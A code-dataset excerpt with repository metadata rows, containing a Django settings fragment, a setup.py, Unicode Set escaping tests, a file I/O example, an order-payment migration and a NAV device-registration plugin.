# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| 25.177419
| 91
| 0.694427
|
af3455583180ef09a57028f1ea36e94d03f3c105
| 822
|
py
|
Python
|
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
setup.py
|
brentyi/nca
|
a018b26b2ac318d10065dac667498cc30ef844a4
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='torchnca',
version='0.1.0',
description='Neighbourhood Components Analysis in PyTorch.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/kevinzakka/nca',
author='Kevin Zakka',
author_email='kevinarmandzakka@gmail.com',
license='MIT',
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
keywords='ai metric learning nearest neighbours dimensionality reduction',
packages=find_packages(exclude=['examples']),
install_requires=[
'numpy>=1.0.0,<2.0.0',
'torch>=1.0.0,<=1.4.0',
],
python_requires='>=3.5',
)
| 28.344828
| 76
| 0.695864
|
ba55c659a8cb3aaef80c73fa1c64948f7b5dfe2c
| 4,988
|
py
|
Python
|
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
python/tests/UnicodeSets_test.py
|
belluzj/sldr
|
cb7e49476654d915a05e250c406a0f59c49b5827
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the University nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import os
import sys
import unittest
try:
from sldr.ldml_exemplars import UCD
import sldr.UnicodeSets
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'lib')))
from sldr.ldml_exemplars import UCD
import sldr.UnicodeSets
class UnicodeSetsTests(unittest.TestCase):
def setUp(self):
self.ucd = UCD()
def tearDown(self):
pass
def list2us_helper(self, text):
"""Wrap the list2us() function for ease of use."""
return sldr.UnicodeSets.list2us(text.split(' '), self.ucd)
# braces
def test_braces(self):
"""Multiple characters sequences need braces around them."""
self.assertEqual(u'[n {ng}]', self.list2us_helper(u'n ng'))
# normalization
def test_nfc(self):
"""NFC text."""
self.assertEqual(u'[\u00E9]', self.list2us_helper(u'\u00e9'))
# isolated marks
def test_isolated_marks_bmp(self):
"""Isolated marks (that is, with no base character) need to be escaped."""
self.assertEqual(u'[\\u0300 \\u0301 {\u0105\u0301}]', self.list2us_helper(u'\u0300 \u0301 \u0105\u0301'))
def test_isolated_marks_nonbmp(self):
"""Isolated marks (outside of the BMP as well) need to be escaped."""
self.assertEqual(u'[\U00011315 \\U0001133c]', self.list2us_helper(u'\U00011315 \U0001133C'))
# characters used in Unicode Set syntax
def ignore_control_escape(self):
"""Some ASCII control characters should be escaped with a backslash.
        These may already be listed in the variable simpleescs.
"""
self.assertEqual(u'[\u0007 \u0008 \u0009 \u000A \u000B \u000C \u000D]',
self.list2us_helper(u'\u0007 \u0008 \u0009 \u000A \u000B \u000C \u000D'))
def test_syntax_escape(self):
"""Some characters used in Unicode Set syntax need to be escaped with a backslash.
The following characters are escaped: []{}\\&-|^$:
They are all used in Unicode Set format
https://unicode.org/reports/tr35/tr35.html#Unicode_Sets
        except for |. We escape | anyway; it should still work.
"""
self.assertEqual(u'[\\[ \\] \\{ \\} \\\\ \\& \\- \\| \\^ \\$ \\:]',
self.list2us_helper(u'[ ] { } \\ & - | ^ $ :'))
# escape some characters with hex digits
def test_ignorable(self):
"""Characters having the Default_Ignorable_Code_Point property need to be escaped."""
self.assertEqual(u'[\\u3164]', self.list2us_helper(u'\u3164'))
def test_format(self):
"""Characters having the format character (general category Cf) property need to be escaped."""
self.assertEqual(u'[\\u06dd]', self.list2us_helper(u'\u06dd'))
def test_space(self):
"""Space like characters need to be escaped."""
self.assertEqual(u'[\\u200a]', self.list2us_helper(u'\u200a'))
def test_pua_bmp(self):
"""PUA characters (in the BMP) need to be escaped."""
self.assertEqual(u'[\\ue000]', self.list2us_helper(u'\ue000'))
def test_pua_nonbmp_a(self):
"""PUA characters (outside of the BMP) need to be escaped."""
self.assertEqual(u'[\\U000fff80]', self.list2us_helper(u'\U000fff80'))
def test_pua_nonbmp_b(self):
"""PUA characters (outside of the BMP and SMP) need to be escaped."""
self.assertEqual(u'[\\U0010ff80]', self.list2us_helper(u'\U0010ff80'))
if __name__ == '__main__':
unittest.main()
| 40.225806 | 113 | 0.679832 |
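A small sketch of one way to run the test module above with the standard library's unittest runner; the python/tests directory comes from the repository path recorded for this file and may need adjusting to the local checkout:

# run_unicodesets_tests.py -- hypothetical helper script, run from the repository root
import unittest

suite = unittest.defaultTestLoader.discover("python/tests", pattern="UnicodeSets_test.py")
unittest.TextTestRunner(verbosity=2).run(suite)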
5f025d6ec4453cd92532d92879541576a33cd536 | 401 | py | Python |
core-python/Core_Python/file/ByteReadAndWrite.py | theumang100/tutorials-1 | 497f54c2adb022c316530319a168fca1c007d4b1 | ["MIT"] | 9 | 2020-04-23T05:24:19.000Z | 2022-02-17T16:37:51.000Z |
core-python/Core_Python/file/ByteReadAndWrite.py | theumang100/tutorials-1 | 497f54c2adb022c316530319a168fca1c007d4b1 | ["MIT"] | 5 | 2020-10-01T05:08:37.000Z | 2020-10-12T03:18:10.000Z |
core-python/Core_Python/file/ByteReadAndWrite.py | theumang100/tutorials-1 | 497f54c2adb022c316530319a168fca1c007d4b1 | ["MIT"] | 9 | 2020-04-28T14:06:41.000Z | 2021-10-19T18:32:28.000Z |
import os
# change your parent dir accordingly
parent_dir = "E:/GitHub/1) Git_Tutorials_Repo_Projects/core-python/Core_Python/ExFiles/"
with open(os.path.join(parent_dir,"ByteReadAndWrite.txt"),'wb+') as f:
f.writelines([b'<----This file is for file pointer example---->',b'\n<----After Writing the pointer change their position---->'])
f.seek(0,0)
print("Read binary files : ",f.read())
| 44.555556 | 133 | 0.700748 |
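The snippet above depends on a machine-specific parent_dir. A sketch of the same write/seek/read-back pattern using a temporary directory so it runs anywhere; the file name here is only illustrative:

import os
import tempfile

with tempfile.TemporaryDirectory() as tmp_dir:
    path = os.path.join(tmp_dir, "ByteReadAndWrite.txt")
    with open(path, "wb+") as f:
        f.writelines([b"<----first line---->", b"\n<----second line---->"])
        f.seek(0, 0)  # rewind to the beginning before reading the bytes back
        print("Read binary file:", f.read())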
27ec174d935a616f45e0b5fff44a1f3ccadda8c6 | 1,096 | py | Python |
saleor/order/migrations/0105_order_total_paid_amount.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | ["CC-BY-4.0"] | 15,337 | 2015-01-12T02:11:52.000Z | 2021-10-05T19:19:29.000Z |
saleor/order/migrations/0105_order_total_paid_amount.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | ["CC-BY-4.0"] | 7,486 | 2015-02-11T10:52:13.000Z | 2021-10-06T09:37:15.000Z |
saleor/order/migrations/0105_order_total_paid_amount.py | aminziadna/saleor | 2e78fb5bcf8b83a6278af02551a104cfa555a1fb | ["CC-BY-4.0"] | 5,864 | 2015-01-16T14:52:54.000Z | 2021-10-05T23:01:15.000Z |
# Generated by Django 3.1.8 on 2021-04-29 07:02
from django.db import migrations, models
from django.db.models.functions import Coalesce
def update_orders_total_paid_in_db(apps, schema_editor):
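    # Backfill total_paid_amount for existing orders from the captured amounts of their payments.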
Order = apps.get_model("order", "Order")
Order.objects.update(
total_paid_amount=models.Subquery(
Order.objects.filter(id=models.OuterRef("id"))
.annotate(
_total_paid_amount=Coalesce(
models.Sum("payments__captured_amount"),
0,
output_field=models.DecimalField(),
)
)
.values("_total_paid_amount")[:1],
)
)
class Migration(migrations.Migration):
dependencies = [
("order", "0104_auto_20210506_0835"),
]
operations = [
migrations.AddField(
model_name="order",
name="total_paid_amount",
field=models.DecimalField(decimal_places=3, default=0, max_digits=12),
),
migrations.RunPython(update_orders_total_paid_in_db, migrations.RunPython.noop),
]
| 28.842105 | 88 | 0.604927 |
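The data migration above backfills each order's total_paid_amount from the sum of its payments' captured amounts. Outside a migration, the same figure could be computed with an ordinary queryset annotation; this is only a sketch, and it assumes the same Order model with a reverse payments relation exposing captured_amount:

from django.db import models
from django.db.models.functions import Coalesce

def annotate_total_paid(order_queryset):
    # order_queryset is assumed to be Order.objects (or a filtered subset) from the same schema.
    return order_queryset.annotate(
        computed_total_paid=Coalesce(
            models.Sum("payments__captured_amount"),
            0,
            output_field=models.DecimalField(),
        )
    )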
0daf1cbdab06b8486c89a25039b7b595ec518677 | 1,900 | py | Python |
src/cnaas_nms/plugins/nav.py | workfloworchestrator/cnaas-nms | 4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d | ["BSD-2-Clause-FreeBSD"] | 48 | 2019-04-08T11:10:03.000Z | 2022-03-31T10:47:56.000Z |
src/cnaas_nms/plugins/nav.py | workfloworchestrator/cnaas-nms | 4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d | ["BSD-2-Clause-FreeBSD"] | 143 | 2019-05-20T13:42:11.000Z | 2022-03-29T07:29:29.000Z |
src/cnaas_nms/plugins/nav.py | workfloworchestrator/cnaas-nms | 4d45708ccb74f620cd5e3b7bc6bb0249ef31ce3d | ["BSD-2-Clause-FreeBSD"] | 9 | 2019-04-16T06:40:12.000Z | 2021-12-03T09:48:46.000Z |
import logging
import requests
from cnaas_nms.plugins.pluginspec import CnaasBasePlugin, hookimpl
from cnaas_nms.tools.log import get_logger
logger = get_logger()
class Plugin(CnaasBasePlugin):
def __init__(self):
self.urlbase = None
self.apitoken = None
self.organizationid = "Undefined"
self.snmp_community = "public"
self.roomid = "Undefined"
pluginvars = self.get_vars(__name__)
if 'urlbase' in pluginvars:
self.urlbase = pluginvars['urlbase']
if 'apitoken' in pluginvars:
self.apitoken = pluginvars['apitoken']
if 'organizationid' in pluginvars:
            self.organizationid = pluginvars['organizationid']
if 'roomid' in pluginvars:
self.roomid = pluginvars['roomid']
if 'snmp_community' in pluginvars:
self.snmp_community = pluginvars['snmp_community']
@hookimpl
def selftest(self):
if self.urlbase and self.apitoken:
return True
else:
return False
@hookimpl
def new_managed_device(self, hostname, device_type, serial_number, vendor,
model, os_version, management_ip):
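        # Register the newly managed device as a netbox in NAV via its REST API.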
headers = {'Authorization': 'Token '+self.apitoken}
data = {
"ip": management_ip,
"sysname": hostname,
"roomid": self.roomid,
"organizationid": self.organizationid,
"categoryid": "SW",
"snmp_version": 2,
"read_only": self.snmp_community
}
r = requests.post(self.urlbase + "/api/1/netbox/",
headers=headers,
json=data)
        if r.status_code != 201:
            logger.warning("Failed to add device to NAV: code {}: {} (data: {})".format(
r.status_code, r.text, data
))
return False
| 32.758621 | 85 | 0.577895 |
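A hedged sketch of exercising the plugin's hook methods directly, for illustration only; it assumes the plugin's configuration (urlbase, apitoken, and friends) has already been loaded by get_vars(), and the device values below are made up rather than part of the cnaas-nms API:

plugin = Plugin()
if plugin.selftest():  # True only when urlbase and apitoken were configured
    plugin.new_managed_device(
        hostname="dist1",
        device_type="DIST",
        serial_number="ABC123",
        vendor="Arista",
        model="vEOS",
        os_version="4.21.0F",
        management_ip="10.0.1.1",
    )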